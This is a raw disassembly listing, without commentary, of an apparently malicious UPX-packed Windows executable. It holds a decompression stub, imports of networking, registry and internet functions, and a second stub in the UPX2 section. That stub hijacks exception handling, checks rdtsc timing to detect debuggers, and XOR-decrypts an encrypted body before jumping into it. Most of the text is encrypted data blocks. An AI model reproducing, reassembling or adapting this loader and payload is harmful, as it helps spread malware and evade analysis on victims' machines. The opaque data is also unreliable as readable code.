dd 7301B223h, 72E1D5Bh, 0C9ABDA00h, 8273C80h, 0EC57DA20h dd 9F324E24h, 461A0003h, 6407923h, 4007471Bh, 45060006h dd 101B9FFFh, 8A151F01h, 48E088h, 444004Fh, 292FFFF6h dd 0F27A6A19h, 281C49E4h, 742530AFh, 0E1536710h, 4DF214F2h dd 3075DF5Ch, 0BAF70400h, 75CDAE6h, 5C085ABDh, 0D8DD4D61h dd 72E5DC8h, 2E380036h, 491B3077h, 0B62E6CECh, 1043EC00h dd 0E5633F00h, 6439E403h dd 4DC08A2h, 0B7FC83D8h, 0FF1640h, 0E00DEDEh, 19F1600h dd 26FD2602h, 2840484Ch, 6110319h, 8BF70D1Bh, 0D374D96Ch dd 90A5C370h, 9C2AB2EFh, 6077256Bh, 109FB6CFh, 1B04480Eh dd 0B73E1354h, 5A545D75h, 22596326h, 45CBC75Ch, 0E7FCD20Fh dd 58765h, 4810030Bh, 0FFB810B8h, 0E7B17FFh, 286A050Bh dd 0B10C3919h, 0A89B11D0h, 0D94FC000h, 0FF85F62Eh, 5D5FF5B1h dd 1CEB8A88h, 0E89F11C9h, 48102B3Ch, 0B9F2D160h, 0F40C5EC8h dd 0CA060A3h, 5790F200h, 0CB10CA0h, 0C8E4EFFBh, 880CA000h dd 90040h, 0EC0703ECh, 0E49E11h, 4F401495h, 0BF40707Ch dd 1B2297B2h, 13430700h, 23FF09E7h, 138578h, 0E9A65BABh dd 63F81013h, 2F90273Ch, 230EFEFFh, 60C30740h, 8408E651h dd 0F74F9388h, 10B94349h, 0B801FFEEh, 0E4D98710h, 0AD200CC9h dd 7C7F070Dh, 0FC85796h, 700118D8h, 3E400F84h, 0F8495E4h dd 36000F95h, 21BF279h, 6C0F847Fh, 0AB7B000Fh, 0A89A1E12h dd 0FF13436Fh, 1F223024h, 50586E69h, 6C725020h, 2B029Bh dd 39014446h, 0F2113F24h, 123C6B32h, 0EC027515h, 41F21035h dd 941C0053h, 72BFFE01h, 0C606EB88h, 73255C5Ch, 6370695Ch dd 0FFE5D424h, 0EC81666Fh, 0E4FF071Ch, 44655300h, 67756265h dd 0E8DF7669h, 67ADD463h, 6A6441CFh, 6F548975h, 0DB92656Bh dd 176EB266h, 126F4C73h, 0FD1C7075h, 61567F76h, 4165756Ch dd 28704F17h, 2C77636Fh, 34C6A475h, 61766B00h, 0DF053367h dd 75E318D4h, 39316DCDh, 0FE6A322Dh, 9F5A3A37h, 72545F6Ch dd 6E577961h, 96DD4364h, 61AF36DAh, 6F94521Eh, 0AD685405h dd 0CCEA354h, 7C45614h, 0BA99B65Ch, 532841B5h, 3EA37845h dd 0FA34356Eh, 0F54BB3D2h, 544822F3h, 7D835054h, 404B46A9h dd 4F6C9C20h, 0BB0A0D4Bh, 1EF52B5h, 244CB4Bh, 0CA044C2Dh dd 676ADF66h, 25203A59h, 0DA2F1875h, 28587B5Ah, 26B97954h dd 6D5A70A7h, 63B2B6A6h, 2E2F15AFh, 8EA9EE56h, 72BF2DCBh dd 59B4CBCDh, 4757B18Bh, 1E3FC304h, 372A942Dh, 0F1640200h dd 0E95FED0Bh, 6D9573D7h, 0B1637673h, 2DDF77D7h, 25692D5Eh dd 175F320Fh, 98B73475h, 7BD2F6Bh, 38393103h, 0D34D34DBh dd 34353637h, 75236933h, 7DCE9A6h, 2F313203h, 0DEF60C39h dd 3837D9h, 37073B43h, 8320C832h, 0C8343536h, 330C8320h dd 93523132h, 0FB8B2CD4h, 0B7F9E03Ah, 0C7EDB58Ah, 54464F47h dd 45524157h, 9163F0Dh, 75435CD7h, 56297272h, 6C378442h dd 5C1E73E8h, 0B36E7552h, 0D0B6ED37h, 0EA6F74E2h, 20306838h dd 7FF81B53h, 0FB0F1A14h, 736E6753h, 796A7264h, 0CB564472h dd 7E741768h, 0B9AAEAA7h, 5F7A43C2h, 0CE23h, 4C10E147h dd 47136055h, 535E01BBh, 9E432053h, 0D5762067h, 0ADBD9B53h dd 945876DCh, 7C23B532h, 2D82F642h, 0E3471A1Bh, 23CB7337h dd 79931217h, 0A35A8473h, 4200F1B1h, 75D72077h, 0BDADB023h dd 6D1B13C5h, 0DD975220h, 0A5B73772h, 2044180Dh, 2F662620h dd 2D856D67h, 2AAC73D9h, 22632463h, 0FED722D9h, 20797469h dd 1E6E614Dh, 1831F81Ah, 420000Ch, 15455D12h, 0FB2493C4h dd 0C0017119h, 65657246h, 0B7E00D0Ch, 470DCD47h, 6F4D7465h dd 2F14BF87h, 434665C5h, 406D614Eh, 74736C01h, 35DEF772h dd 0A956380h, 79706F43h, 0E1480A19h, 456102DEh, 22326578h dd 0F8A5FFEDh, 6C6F6F54h, 3233703Bh, 70616E53h, 746F6873h dd 9B5BBA19h, 32127414h, 540F7372h, 235AE60Bh, 182C35A3h dd 0F60B6C21h, 78654E01h, 41616974h, 16BFFB54h, 0CF76453Ch dd 7469616Bh, 53726F46h, 0ED74423Ch, 4F7B676Dh, 2C766A62h dd 0E025A144h, 8D22B59Bh, 0CD964CB7h, 45DB76CDh, 2F725072h dd 48196972h, 0EF64BDD6h, 486573FDh, 0C646E61h, 886C3255h dd 8B61B59h, 4618E06Eh, 46D735F1h, 64B14465h, 59498B4Bh dd 530C1BC0h, 64656B1Dh, 0ADDD1F45h, 1270B36Dh, 661D4061h dd 1153246Fh, 96EC9B3h, 6EC17065h, 25CFF64Bh, 12EE9E9Bh dd 6464410Bh, 0EF660F72h, 4CD9221Bh, 61726269h, 0CD15B567h dd 4D2BC1B5h, 6C137C82h, 0BB961016h, 8763CF9Ch, 54F685B5h dd 75969869h, 2B4DDE65h, 0B15B092h, 0B4B44278h, 0D366C37h dd 0E539AF5Dh, 5D22CC21h, 78456862h, 66C25B6Dh, 630AF631h dd 373C6D13h, 522D8DC1h, 87B591Bh, 2ECD82ADh, 38657A94h dd 9F9D5B5Ch, 2CD1937Dh, 654B9367h, 0EC3B4579h, 7810CE40h dd 0A510F99h, 5AC25EC0h, 309011E8h, 426C5987h, 0D21021E7h dd 7B70A107h, 62410C51h, 6853B024h, 688D0E29h, 0FF78F1F6h dd 0D9851AC1h, 10892877h, 7DB662BBh, 6112440Ah, 6669320Eh dd 0B63AD61Bh, 8F67BC79h, 6C362B75h, 436F616Fh, 2C796FC0h dd 23506F11h, 52106770h, 3F900E8Fh, 0B4A438F6h, 71634114h dd 70726975h, 4DD874AEh, 3AA03549h, 59A7C336h, 73ECDE13h dd 6D06BC72h, 0D1CE18B1h, 840E27B2h, 99DA150Fh, 1D4D536Bh dd 0C54A445Fh, 3FB8740Ah, 0C5E8685Fh, 6EC46D27h, 0AD0702CDh dd 880D696Fh, 660AD172h, 14E955B3h, 40288901h, 0F3488CD3h dd 0CC652D15h, 0EC0CC362h, 0E10A1415h, 0DF26106Eh, 776C49ACh dd 0C20B7073h, 0B75BB669h, 0F44F4166h, 3DB6FC28h, 8B2C2834h dd 1141A155h, 16C05212h, 6A615F0Eh, 6B14C370h, 0C9416E09h dd 3BB86658h, 1A877453h, 0F5135B3Fh, 7940EB45h, 2C020273h dd 0D2CB2CBh, 346F3901h, 0B2CB2CB2h, 4090C17h, 2AA4F413h dd 141610CBh, 7C834550h, 74EC4AABh, 40E07ED2h, 0CE8011E0h dd 10F00FDh, 0BE06010Bh, 6ABA120Ch, 0EFCB20ECh, 31431024h dd 0BA4B020Bh, 7283259h, 364600Ch, 341E733Bh, 8060710h dd 37B39609h, 0E33F8C2Fh, 6405DB0Ah, 2E1E0180h, 0B06C0C5Bh dd 263207DDh, 0DBC42890h, 7D0483E3h, 642EE004h, 6E54FBE7h dd 1221DD21h, 162C27h, 0C08574BEh, 0C9314648h, 54h, 0 align 10h pusha mov esi, offset dword_31436000 lea edi, [esi-5000h] push edi or ebp, 0FFFFFFFFh jmp short loc_31437CA2 ; --------------------------------------------------------------------------- align 8 loc_31437C98: ; CODE XREF: UPX1:loc_31437CA9j mov al, [esi] inc esi mov [edi], al inc edi loc_31437C9E: ; CODE XREF: UPX1:31437D36j ; UPX1:31437D4Dj add ebx, ebx jnz short loc_31437CA9 loc_31437CA2: ; CODE XREF: UPX1:31437C90j mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31437CA9: ; CODE XREF: UPX1:31437CA0j jb short loc_31437C98 mov eax, 1 loc_31437CB0: ; CODE XREF: UPX1:31437CBFj ; UPX1:31437CCAj add ebx, ebx jnz short loc_31437CBB mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31437CBB: ; CODE XREF: UPX1:31437CB2j adc eax, eax add ebx, ebx jnb short loc_31437CB0 jnz short loc_31437CCC mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jnb short loc_31437CB0 loc_31437CCC: ; CODE XREF: UPX1:31437CC1j xor ecx, ecx sub eax, 3 jb short loc_31437CE0 shl eax, 8 mov al, [esi] inc esi xor eax, 0FFFFFFFFh jz short loc_31437D52 mov ebp, eax loc_31437CE0: ; CODE XREF: UPX1:31437CD1j add ebx, ebx jnz short loc_31437CEB mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31437CEB: ; CODE XREF: UPX1:31437CE2j adc ecx, ecx add ebx, ebx jnz short loc_31437CF8 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31437CF8: ; CODE XREF: UPX1:31437CEFj adc ecx, ecx jnz short loc_31437D1C inc ecx loc_31437CFD: ; CODE XREF: UPX1:31437D0Cj ; UPX1:31437D17j add ebx, ebx jnz short loc_31437D08 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31437D08: ; CODE XREF: UPX1:31437CFFj adc ecx, ecx add ebx, ebx jnb short loc_31437CFD jnz short loc_31437D19 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jnb short loc_31437CFD loc_31437D19: ; CODE XREF: UPX1:31437D0Ej add ecx, 2 loc_31437D1C: ; CODE XREF: UPX1:31437CFAj cmp ebp, 0FFFFF300h adc ecx, 1 lea edx, [edi+ebp] cmp ebp, 0FFFFFFFCh jbe short loc_31437D3C loc_31437D2D: ; CODE XREF: UPX1:31437D34j mov al, [edx] inc edx mov [edi], al inc edi dec ecx jnz short loc_31437D2D jmp loc_31437C9E ; --------------------------------------------------------------------------- align 4 loc_31437D3C: ; CODE XREF: UPX1:31437D2Bj ; UPX1:31437D49j mov eax, [edx] add edx, 4 mov [edi], eax add edi, 4 sub ecx, 4 ja short loc_31437D3C add edi, ecx jmp loc_31437C9E ; --------------------------------------------------------------------------- loc_31437D52: ; CODE XREF: UPX1:31437CDCj pop esi mov edi, esi mov ecx, 86h loc_31437D5A: ; CODE XREF: UPX1:31437D61j ; UPX1:31437D66j mov al, [edi] inc edi sub al, 0E8h loc_31437D5F: ; CODE XREF: UPX1:31437D84j cmp al, 1 ja short loc_31437D5A cmp byte ptr [edi], 1 jnz short loc_31437D5A mov eax, [edi] mov bl, [edi+4] shr ax, 8 rol eax, 10h xchg al, ah sub eax, edi sub bl, 0E8h add eax, esi mov [edi], eax add edi, 5 mov eax, ebx loop loc_31437D5F lea edi, [esi+5000h] loc_31437D8C: ; CODE XREF: UPX1:31437DAEj mov eax, [edi] or eax, eax jz short loc_31437DD7 mov ebx, [edi+4] lea eax, [eax+esi+7000h] add ebx, esi push eax add edi, 8 call dword ptr [esi+708Ch] xchg eax, ebp loc_31437DA9: ; CODE XREF: UPX1:31437DCFj mov al, [edi] inc edi or al, al jz short loc_31437D8C mov ecx, edi jns short near ptr loc_31437DBA+1 movzx eax, word ptr [edi] inc edi push eax inc edi loc_31437DBA: ; CODE XREF: UPX1:31437DB2j mov ecx, 0AEF24857h push ebp call dword ptr [esi+7090h] or eax, eax jz short loc_31437DD1 mov [ebx], eax add ebx, 4 jmp short loc_31437DA9 ; --------------------------------------------------------------------------- loc_31437DD1: ; CODE XREF: UPX1:31437DC8j call dword ptr [esi+7094h] loc_31437DD7: ; CODE XREF: UPX1:31437D90j popa jmp loc_314324EF ; --------------------------------------------------------------------------- align 400h UPX1 ends ; Section 3. (virtual address 00008000) ; Virtual size : 0003A000 ( 237568.) ; Section size in file : 0003A000 ( 237568.) ; Offset to raw data for section: 00008000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX2 segment para public 'CODE' use32 assume cs:UPX2 ;org 31438000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dd 3 dup(0) dd 80C4h, 808Ch, 3 dup(0) dd 80D1h, 809Ch, 3 dup(0) dd 80DEh, 80A4h, 3 dup(0) dd 80E9h, 80ACh, 3 dup(0) dd 80F4h, 80B4h, 3 dup(0) dd 8100h, 80BCh, 5 dup(0) dword_3143808C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; UPX2:3144203Ar ... dd 7C80ADA0h, 7C81CDDAh, 0 dd 77DD6BF0h, 0 dd 77C371D3h, 0 dd 7E41A8ADh, 0 dd 42C2C8A1h, 0 dd 71AB9639h, 0 dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h dd 6E65704Fh, 41h, 26h dup(0) dd 0C3906893h, 0C48BED01h, 0E85BD0FFh, 5Fh, 824648Bh, 4EBB8h dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 427500F8h dd 0E8h, 0ED815D00h, 402338h, 2385858Bh, 85030040h, 40238Dh dd 858BF08Bh, 402389h, 238D8503h, 60500040h, 0C933FE8Bh dd 2395958Ah, 32AC0040h, 0AAD002C2h, 918D3B41h, 7C004023h dd 2BC361F1h, 30FF64C0h, 0B8208964h, 12345678h, 60000387h dd 7C800000h, 0 dd 1E003143h, 300000h, 75Ch dup(0) ; --------------------------------------------------------------------------- pusha call loc_3143A010 call sub_3143A094 jmp near ptr byte_3143A040 ; --------------------------------------------------------------------------- loc_3143A010: ; CODE XREF: UPX2:3143A001p push dword ptr fs:0 xor ds:dword_3143A041, esp mov fs:0, esp xor ecx, ecx push ecx push 80000000h push ecx push ecx push 80000000h push ecx push ecx push 800h push ecx push ecx call ds:dword_3143808C ; LoadLibraryA ; --------------------------------------------------------------------------- byte_3143A040 db 0BCh ; CODE XREF: UPX2:3143A00Bj dword_3143A041 dd 12FF9Ch ; --------------------------------------------------------------------------- cld sub eax, eax loc_3143A048: ; CODE XREF: UPX2:3143A04Ej dec al or al, al jz short loc_3143A052 jnz short loc_3143A048 jmp short loc_3143A0B9 ; --------------------------------------------------------------------------- loc_3143A052: ; CODE XREF: UPX2:3143A04Cj call $+5 pop edx sub edx, 0FFFFFFB6h xor ecx, ecx xor ecx, 28B0h mov ebp, 91h cld cld push edx loc_3143A06E: ; CODE XREF: UPX2:3143A080j xchg al, [edx] xor ax, bp cld xchg al, [edx] cld add edx, 1 inc ebp sub ecx, 1 or ecx, ecx jnz short loc_3143A06E pop edx pop large dword ptr fs:0 pop ebp mov [esp+14h], edx popa jmp edx ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= sub_3143A094 proc near ; CODE XREF: UPX2:3143A006p arg_C = dword ptr 10h mov edx, [esp+arg_C] xor eax, eax pop dword ptr [edx+0B8h] retn sub_3143A094 endp ; sp-analysis failed ; --------------------------------------------------------------------------- db 0E8h, 2 dup(0) dd 48B0000h, 9889FC24h, 2FE3h, 28A080F7h, 0 db 0 ; --------------------------------------------------------------------------- loc_3143A0B9: ; CODE XREF: UPX2:3143A050j or byte ptr [ebx+7404245Ch], 2Ch pop ecx mov [eax+2FE7h], esi mov [eax+2FEBh], edi cmp byte ptr [eax+28A4h], 0E8h jnz short loc_3143A0E3 add ebx, [eax+28A5h] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_3143A0EB ; --------------------------------------------------------------------------- loc_3143A0E3: ; CODE XREF: UPX2:3143A0D4j mov ebx, [eax+28A6h] push dword ptr [ebx] loc_3143A0EB: ; CODE XREF: UPX2:3143A0E1j pop ebx push ebp mov ebp, eax sub dword ptr [esp+4], 1EA6h sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+3638B0h] mov ecx, 0 rep movsb call sub_3143A161 ; CODE XREF: UPX2:3143A17Fj mov ecx, eax call sub_3143A161 sub eax, ecx jz short loc_3143A135 cmp eax, 100h ja short loc_3143A135 lea eax, [ebp+3610D3h] mov dl, [eax-10h] call sub_3143A165 jmp short loc_3143A174 ; --------------------------------------------------------------------------- loc_3143A135: ; CODE XREF: UPX2:3143A11Cj ; UPX2:3143A123j test dword ptr [ebp+3638A5h], 80000000h jz short loc_3143A15F lea esi, [ebp+3638A9h] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FECh] mov edi, [ebp+363FF0h] mov ebx, [ebp+363FE8h] loc_3143A15F: ; CODE XREF: UPX2:3143A13Fj pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3143A161 proc near ; CODE XREF: UPX2:3143A10Ep ; UPX2:3143A115p rdtsc retn sub_3143A161 endp ; --------------------------------------------------------------------------- db 0ECh ; =============== S U B R O U T I N E ======================================= sub_3143A165 proc near ; CODE XREF: UPX2:3143A12Ep mov dh, dl mov ecx, 27D2h loc_3143A16C: ; CODE XREF: sub_3143A165+Cj xor [eax], dl inc eax add dl, dh loop loc_3143A16C retn sub_3143A165 endp ; --------------------------------------------------------------------------- loc_3143A174: ; CODE XREF: UPX2:3143A133j insd cmp eax, esp inc eax arpl [edi-0Bh], si sbb eax, [edx] insb dec esp jns short near ptr loc_3143A10E+2 pushf fadd qword ptr [ecx+47h] cwde test [eax+5Ch], esi cmp eax, 0FBCFABDBh cmpsd in al, dx fisubr dword ptr [ecx] lodsb shr byte ptr [ecx], 1 sub eax, 704CBBA8h div dword ptr [ebx] inc edi retf 1B84h ; --------------------------------------------------------------------------- dd 0B3577036h, 3307B57Dh, 0A2CC49BAh, 591128F8h, 6F1150BDh dd 0C4A0998Fh, 399E6A99h, 1C0DFB11h, 0E4A663D8h, 7F779BF5h dd 0AB7A4CEBh, 2BE7E476h, 83139C37h, 3048B09Fh, 8CB7081Ch dd 0D8C1CBA3h, 2C30061Dh, 0F571849h, 0E631410Ah, 0B8644EB7h dd 142831h, 0D1A1AAAFh, 1631EDE8h, 51505629h, 162BBBFCh dd 4BCE1D25h, 2DDC486Ah, 97E4F80Ch, 0E1D8DCD9h, 42012C1Fh dd 0E086676Eh, 1972479Fh, 766F26F9h, 0F3C7F02Ch, 6031C8DCh dd 0AF67FC83h, 0FF44D7C3h, 86FF9679h, 6FB40D9Ch, 1027B9C9h dd 0EC6968FCh, 7184AEB9h, 95CB5C29h, 0D0D2C7E4h, 95B82542h dd 0B5CB585Ah, 0E0C21D98h, 3527BF27h, 40627DF8h, 84A19B2Ch dd 0A0B4FEC9h, 451CDD0Fh, 8314280Ah, 86D1A449h, 0A623889Ch dd 2636E9C9h, 755DE9FCh, 70B2A3FEh, 35C4FDD1h, 19D7F83Ah dd 0BBCA1531h, 10F5585Ah, 0E0F784F4h, 55BE7CCh, 406253E2h dd 0FF1BF0EDh, 0A0B41C58h, 4423F38Ch, 0C3176856h, 0B0D4D884h dd 36F10194h, 78240E77h, 0C0D498F5h, 0E57B98C6h, 2002738Ah dd 54EB3889h, 8094AA52h, 30F1D5FBh, 6BF43E0Ch, 9CA70123h dd 0ADD5687Ch, 0F032082Ch, 0B2E55D51h, 0F59778BAh, 0EC97CAC3h dd 0DA3853CCh, 39B4BB94h, 0B1DADC1h, 6B27E8CAh, 270D6427h dd 3C73B64Ch, 0D0E7905Bh, 156BA8BDh, 3072633Ah, 65D4CC9Fh dd 0F20B70Ch, 0D754687Eh, 0F16E1846h, 0A0B0C8B4h, 5064100Ch dd 95EB283Dh, 0B0F2E3BAh, 0E47B4819h, 10243ACEh, 0A884E896h dd 708098ACh, 0C8F54836h, 0D18EAF00h, 8095C0ECh, 0A5BB586Dh dd 0E0C2334Ah, 91A4B2A4h, 16C1977Ch, 18042E17h, 0A0B4C8D9h dd 50662965h, 5914423Ch, 0BAAED20Fh, 5BBE1D63h, 0E1CF387Ah dd 0B6696B3Fh, 7084AE97h, 2200CC53h, 0D60CF80Ch, 0CE94A8BCh dd 7C081C38h, 7261F71Ch, 1DA48EF7h, 7643A2C9h, 7DCD2B2Ch dd 968F1661h, 0C36AC98Ch, 165CD4h, 0A2795BECh, 6074BEA0h dd 1224BC43h, 455FE8FCh, 70B2A34Eh, 0AF3538A3h, 0E6D30489h dd 7A1123BCh, 0CF446E57h, 657B096Ch, 90928085h, 7BB2EDF7h dd 80FB181Ah, 0F03147DDh, 0DB644EB4h, 362FC2B1h, 4FDE3BECh dd 0E5FB89EDh, 10120011h, 0FB266577h, 7967989Ah, 0AF3539A3h dd 0E6DC9289h, 812C40BCh, 8DC9586Ch, 0E0C23474h, 90CE7747h dd 30ABB18Ah, 0F3E59B28h, 59B788B6h, 3A6412DBh, 0D7A1A524h dd 9C4EEF9h, 60748885h, 0EE693CC1h, 0A62B1703h, 3D801507h dd 2034485Ch, 9769536Ah, 64A603B8h, 0B50CDE1h, 8658082Ah dd 3BC2BA45h, 0A256AAFFh, 9AD093D9h, 0D0BDA0DCh, 9CEF788Ch dd 0C49F2856h, 0B0ACD886h, 0A7C889Ch, 7A76690Ch, 552BB8F2h dd 70B2A342h, 60F0CB04h, 0D094F164h, 0EA4023BCh, 5A88D36Ch dd 8AF4625Ch, 90CEEACEh, 40246114h, 0A104722Ch, 5FE437B6h dd 665F8E19h, 854D773Ch, 0B740D713h, 0ED74889Dh, 263438F9h dd 0CCD751FCh, 9F0F98ACh, 0CDB5EDAFh, 0D0D2E80Ch, 94A32D31h dd 0D0BB585Ah, 0C09E5C4Ch, 55B47A6h, 40625382h, 855BD8A9h dd 0A1FA20E8h, 418C788Ch, 5314283Ch, 0D2A19C89h, 1224EFE9h dd 7C4D4E25h, 0C0B18F99h, 75CB70FBh, 95CB485Ch, 0D0D2C760h dd 0BB163D43h, 0CF13585Ah, 0D6CF4E89h, 0FAA4D2CCh, 36C1977Eh dd 49042E17h, 0A0B4C9F4h, 0D985531Bh, 57400C30h, 8B7E4D13h dd 964788AAh, 2C729DCFh, 94D4E8CAh, 0CE1167FBh, 0A5347E67h dd 96828CCCh, 0F290563Fh, 1430A782h, 8AF46214h, 263147E6h dd 0C5545E47h, 63D86CECh, 0A0B14F34h, 0C1AD4B8Ch, 852D12DFh dd 0B0F2E4BAh, 1CF5BAE9h, 63471C68h, 0E8A09B8Eh, 7E19592Dh dd 7464485Ch, 80B5AE5Ch, 156BFBECh, 30726302h, 94ADC899h dd 0B4D047C3h, 16D1E774h, 18042E10h, 5F4B3519h, 16F187DFh dd 0EB141E07h, 98005962h, 3774889Dh, 2B62ADB3h, 552BE8CAh dd 70B2A3EAh, 0DFCF20B5h, 0BABEF8F3h, 0EA94C2BCh, 5844326Ch dd 0E0F0081Dh, 90CE7C47h, 0CB58022Ch, 0A6E6E7E8h, 0A08097A4h dd 0B8AD4B8Ch, 0FFEBD7E6h, 0A5824D61h, 312688AAh, 85DB681Dh dd 0C0E2D3B6h, 0B3A45C2Fh, 786C10CCh, 0D0D4F10Ch, 809AC0BCh dd 3044596Ch, 0E0F4081Ch, 90A4B8CCh, 407CCD7Ch, 0F004182Ch dd 0F3E299DCh, 6B36ED73h, 59BF280Ah, 0C5045C40h, 0A39A6A67h dd 955ADC1h, 3F86E8CAh, 46BF3239h, 4CB1C15Ch, 38E4CE33h dd 8094A8AAh, 5B2B3720h, 92A47869h, 0FCCDCEA5h, 16310F19h dd 9571744Dh, 5FE4C89Dh, 665F2A19h, 7091A13Ch, 73C4EED3h dd 1315CAC0h, 7D457629h, 0A29B8C99h, 4E7FDC6h, 5462142Fh dd 0A4879D5Fh, 0F4E7C4BCh, 5E21341Eh, 85864B1Ch, 0D6C1CCADh dd 1310415h, 95765B2Ch, 0E6D1BCBDh, 1D0114E5h, 6964585Dh dd 0B085BF82h, 111FADFh, 62745D38h, 0B3B18B93h, 3384D9DFh dd 54552D2Eh, 0BD81AA69h, 0D4F1DCD3h, 51212A04h, 92B70878h dd 0F5D0D9A9h, 25260028h, 0B3047C4Dh, 0D4D5ADAEh, 3F0B2CE9h dd 6C714050h, 0E3F6EB9Ch, 1304E9F2h, 10505724h, 0B4BD90B9h dd 15F6F0F8h, 66342C3Dh, 84819465h, 0D4F1C5D5h, 433D0B03h dd 0B4996D68h, 90C1D5A5h, 25311A3Ah, 82667160h, 0A0CDBABDh dd 16101DCBh, 41714455h, 0D9B6AC98h, 500FDFEh, 5724793Fh dd 0A9929C99h, 19D7FDC0h, 67342D26h, 0B9A28C69h, 0E9C0CDD0h dd 77443D01h, 8FB97C79h, 0F5C8CDA8h, 243A0934h, 0F0457D40h dd 0F4C0AD9Bh, 161415E9h, 4E714455h, 0F1A1B58Dh, 1411CF9Ch dd 60495D18h, 0A8A089ACh, 15C398EDh, 52511E28h, 0BE8B917Fh dd 0F4F1EFBCh, 43363D3Ah, 0A59A6775h, 0D7A4F9B4h, 2F021C19h dd 95696D40h, 0CFD2A695h, 240515FEh, 417A4755h, 0D1AB94ECh dd 21DC4F8h, 6956593Eh, 0A199E8BDh, 15EDCEDCh, 6652072Bh dd 0D0819465h, 0EEF1D8F3h, 5528312Ah, 90846951h, 0D1C3D6A5h dd 2524277Ch, 9F764842h, 0D3C7ADBFh, 3F16288Ch, 73674D5Fh dd 0D982EADFh, 6000FBEEh, 734B4A1Ch, 0F3A79B99h, 8E1D69Eh dd 45674828h, 0BC8DBE78h, 0F4E0E9D9h, 4526311Eh, 0A1876D68h dd 0E4C1EBCCh, 2538013Ah, 95697178h, 0C5D89BDCh, 36408E9h dd 65605B45h, 0DDAD8C81h, 261BDCF9h, 44415425h, 0C0B18595h dd 11E9F6F9h, 455D1E2Ch, 9682B77Bh, 80F1C4D5h, 4436313Ah dd 0A1986969h, 0F3CBD4A0h, 29263F7Ch, 99427D58h, 0EEB4ADB0h dd 3A0039F8h, 50605B49h, 0D9B2B19Eh, 513EDF0h, 7B4B6C3Fh dd 8ED48699h, 15F6DBD8h, 66513C3Dh, 0D0819465h, 0F2D7DCF2h dd 55303909h, 839B7A4Ch, 90D7CBA9h, 32171C32h, 95707949h dd 0C3DBBA8Ch, 15170BE9h, 745A2844h, 0D1A1AAAFh, 527EDE8h dd 7F4D4C2Fh, 0B49AE892h, 11E1EAEFh, 53612D28h, 0A2B48A69h dd 0F3F1CBD3h, 440A581Fh, 0B6846951h, 0DFD3DDA5h, 23313B1Ah dd 9E6B7158h, 0EFC086DCh, 160A1DFCh, 714455h, 0C08BACA2h dd 1224E6F9h, 63415B23h, 0ABBBBC8Fh, 3E84F6C9h, 45440728h dd 0B381AB62h, 0EEFBC1C8h, 6030166Ch, 8580676Eh, 0F9F2CCAFh dd 21211C0Eh, 9D615540h, 0A0CDBAB3h, 25350CC2h, 496D5A59h dd 0C2ABBE82h, 900E9F1h, 7F705623h, 0C0BA8D97h, 2D3ECE2h dd 76513C35h, 0A5908A65h, 0E5D9C4DDh, 49363701h, 8C805A1Ch dd 0F3CDD699h, 13310C13h, 9E6D6A58h, 0E1DB9CBBh, 30D0BE2h dd 6E7D5A48h, 0E393D88Bh, 100DBDDh, 60514C3Eh, 0AFB88BFCh dd 1FF7FDDFh, 5451233Fh, 0BE8B9B0Ch, 0F4F7CDD2h, 44213F6Ch dd 94876774h, 0F1CAC1AEh dd 32540D11h, 0F0727B49h, 0C4DAADAFh, 330B0B8Ch, 604D57h dd 0D5B0B6A5h, 1411E6EEh, 634B540Fh, 0AEB5A099h, 70E1F4C8h dd 45402615h, 0A481967Eh, 0C3E0CDFBh, 552A3603h, 84917C7Fh dd 0E4C5CC9Fh, 2E1D6819h, 9E767D58h, 0D0FBBCB9h, 502516E9h dd 65604675h, 0C4A1B69Eh, 0E11F8D3h, 51484A19h, 0B4BAA1FCh dd 15EAEAC9h, 41511A28h, 0BC8DBE68h, 0C4D5A8D9h, 7914193Ah dd 0A4DA3A2Fh, 0C2A4F480h, 2C170F19h, 0BB616B43h, 0F2B4B1B9h dd 202B1FE9h, 655F4659h, 0F1BC9D95h, 711DA9Ch, 62414D1Dh dd 0ACB5BE85h, 8C1FDD9h, 4566481Dh, 0A481AB6Bh, 0F5F8C9EAh dd 713C1D09h, 16C75E1Ch, 0C6F2BAA6h, 413EBCF7h, 0E876E77Eh dd 0D021378Ah, 0DB644EB3h, 56427EF8h, 0C03B8EBCh, 0BEE17784h dd 93240E77h, 28AF838h, 390998A4h, 71FC63A7h, 0D0E4F864h dd 0A4D82554h, 5A44326Fh, 0B3A45919h, 5C2FBDA6h, 1080E32Ch dd 0A1447278h, 354B9B8Eh, 5052448Ah, 0FF18ECBFh, 86F8D679h dd 68B00B9Ch, 4B1B58Fh, 0F3D4DEC7h, 2284F265h, 12347834h dd 8120730Ch, 0D0D4C2EDh, 0B35C323Dh, 8AA000DCh, 55BE8C2h dd 4062547Eh, 0C324DCAFh, 0AF744D0Eh, 8A93BA15h, 0C3D60B64h dd 583BEBBBh, 9F8B775Dh, 1081BC43h, 0A884E8FCh, 7084E8A5h dd 205E9CD7h, 908E3487h, 9094A8D4h, 6246326Ch, 0E99C0876h dd 0FAA4B8BCh, 1007397Ch, 0CBF28DD3h, 0F9EBC8EAh, 